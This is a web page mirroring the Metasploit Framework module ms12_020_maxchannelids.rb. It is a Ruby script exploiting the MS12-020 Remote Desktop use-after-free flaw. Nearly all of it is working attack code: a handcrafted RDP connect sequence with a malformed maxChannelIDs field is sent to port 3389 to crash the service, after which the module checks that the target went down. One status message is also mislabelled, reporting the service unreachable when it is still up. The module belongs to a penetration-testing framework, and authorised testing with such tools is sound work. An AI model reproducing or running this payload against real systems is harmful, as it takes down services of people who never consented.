Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Auxiliary::Report
8
include Msf::Exploit::Remote::Tcp
9
include Msf::Auxiliary::Dos
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'MS12-020 Microsoft Remote Desktop Use-After-Free DoS',
16
'Description' => %q{
17
This module exploits the MS12-020 RDP vulnerability originally discovered and
18
reported by Luigi Auriemma. The flaw can be found in the way the T.125
19
ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result
20
an invalid pointer being used, therefore causing a denial-of-service condition.
21
},
22
'References' => [
23
[ 'CVE', '2012-0002' ],
24
[ 'MSB', 'MS12-020' ],
25
[ 'URL', 'http://www.privatepaste.com/ffe875e04a' ],
26
[ 'URL', 'http://web.archive.org/web/20161020044803/http://pastie.org/private/4egcqt9nucxnsiksudy5dw' ],
27
[ 'URL', 'http://web.archive.org/web/20160627131634/http://pastie.org/private/feg8du0e9kfagng4rrg' ],
28
[ 'URL', 'http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html' ],
29
[ 'EDB', '18606' ],
30
[ 'URL', 'https://www.rapid7.com/blog/post/2012/03/21/metasploit-update/' ]
31
],
32
'Author' => [
33
'Luigi Auriemma',
34
'Daniel Godas-Lopez', # Entirely based on Daniel's pastie
35
'Alex Ionescu',
36
'jduck',
37
'#ms12-020' # Freenode IRC
38
],
39
'License' => MSF_LICENSE,
40
'DisclosureDate' => '2012-03-16',
41
'Notes' => {
42
'Stability' => [CRASH_SERVICE_DOWN],
43
'SideEffects' => [],
44
'Reliability' => []
45
}
46
)
47
)
48
49
register_options(
50
[
51
Opt::RPORT(3389)
52
]
53
)
54
end
55
56
def is_rdp_up
57
connect
58
disconnect
59
return true
60
rescue Rex::ConnectionRefused
61
return false
62
rescue Rex::ConnectionTimeout
63
return false
64
end
65
66
def run
67
max_channel_ids = "\x02\x01\xff"
68
69
pkt = '' \
70
"\x03\x00\x00\x13" + # TPKT: version + length
71
"\x0E\xE0\x00\x00" + # X.224 (connection request)
72
"\x00\x00\x00\x01" \
73
"\x00\x08\x00\x00" \
74
"\x00\x00\x00" \
75
"\x03\x00\x00\x6A" + # TPKT: version + length
76
"\x02\xF0\x80" + # X.224 (connect-initial)
77
"\x7F\x65\x82\x00" + # T.125
78
"\x5E" \
79
"\x04\x01\x01" + # callingDomainSelector
80
"\x04\x01\x01" + # calledDomainSelector
81
"\x01\x01\xFF" + # upwardFlag
82
"\x30\x19" + # targetParameters
83
max_channel_ids + # maxChannelIds
84
"\x02\x01\xFF" + # maxUserIds
85
"\x02\x01\x00" + # maxTokenIds
86
"\x02\x01\x01" + # numPriorities
87
"\x02\x01\x00" + # minThroughput
88
"\x02\x01\x01" + # maxHeight
89
"\x02\x02\x00\x7C" + # maxMCSPDUsize
90
"\x02\x01\x02" + # protocolVersion
91
"\x30\x19" + # minimumParameters
92
max_channel_ids + # maxChannelIds
93
"\x02\x01\xFF" + # maxUserIds
94
"\x02\x01\x00" + # maxTokenIds
95
"\x02\x01\x01" + # numPriorities
96
"\x02\x01\x00" + # minThroughput
97
"\x02\x01\x01" + # maxHeight
98
"\x02\x02\x00\x7C" + # maxMCSPDUsize
99
"\x02\x01\x02" + # protocolVersion
100
"\x30\x19" + # maximumParameters
101
max_channel_ids + # maxChannelIds
102
"\x02\x01\xFF" + # maxUserIds
103
"\x02\x01\x00" + # maxTokenIds
104
"\x02\x01\x01" + # numPriorities
105
"\x02\x01\x00" + # minThroughput
106
"\x02\x01\x01" + # maxHeight
107
"\x02\x02\x00\x7C" + # maxMCSPDUsize
108
"\x02\x01\x02" + # protocolVersion
109
"\x04\x82\x00\x00" + # userData
110
"\x03\x00\x00\x08" + # TPKT: version + length
111
"\x02\xF0\x80" + # X.224
112
"\x28" + # T.125
113
"\x03\x00\x00\x08" + # TPKT: version + length
114
"\x02\xF0\x80" + # X.224
115
"\x28" + # T.125
116
"\x03\x00\x00\x08" + # TPKT: version + length
117
"\x02\xF0\x80" + # X.224
118
"\x28" + # T.125
119
"\x03\x00\x00\x08" + # TPKT: version + length
120
"\x02\xF0\x80" + # X.224
121
"\x28" + # T.125
122
"\x03\x00\x00\x08" + # TPKT: version + length
123
"\x02\xF0\x80" + # X.224
124
"\x28" + # T.125
125
"\x03\x00\x00\x08" + # TPKT: version + length
126
"\x02\xF0\x80" + # X.224
127
"\x28" + # T.125
128
"\x03\x00\x00\x08" + # TPKT: version + length
129
"\x02\xF0\x80" + # X.224
130
"\x28" + # T.125
131
"\x03\x00\x00\x08" + # TPKT: version + length
132
"\x02\xF0\x80" + # X.224
133
"\x28" + # T.125
134
"\x03\x00\x00\x0C" + # TPKT: version + length
135
"\x02\xF0\x80" + # X.224
136
"\x38\x00\x06\x03" + # T.125
137
"\xF0" \
138
"\x03\x00\x00\x09" + # TPKT: version + length
139
"\x02\xF0\x80" + # X.224
140
"\x21\x80" # T.125
141
142
unless is_rdp_up
143
print_error("#{rhost}:#{rport} - RDP Service Unreachable")
144
return
145
end
146
147
connect
148
print_status("#{rhost}:#{rport} - Sending #{name}")
149
sock.put(pkt)
150
Rex.sleep(3)
151
disconnect
152
print_status("#{rhost}:#{rport} - #{pkt.length} bytes sent")
153
154
print_status("#{rhost}:#{rport} - Checking RDP status...")
155
156
if is_rdp_up
157
print_error("#{rhost}:#{rport} - RDP Service Unreachable")
158
return
159
else
160
print_good("#{rhost}:#{rport} seems down")
161
report_vuln({
162
host: rhost,
163
port: rport,
164
name: name,
165
refs: references,
166
info: "Module #{fullname} successfully crashed the target system via RDP"
167
})
168
end
169
end
170
end
171
172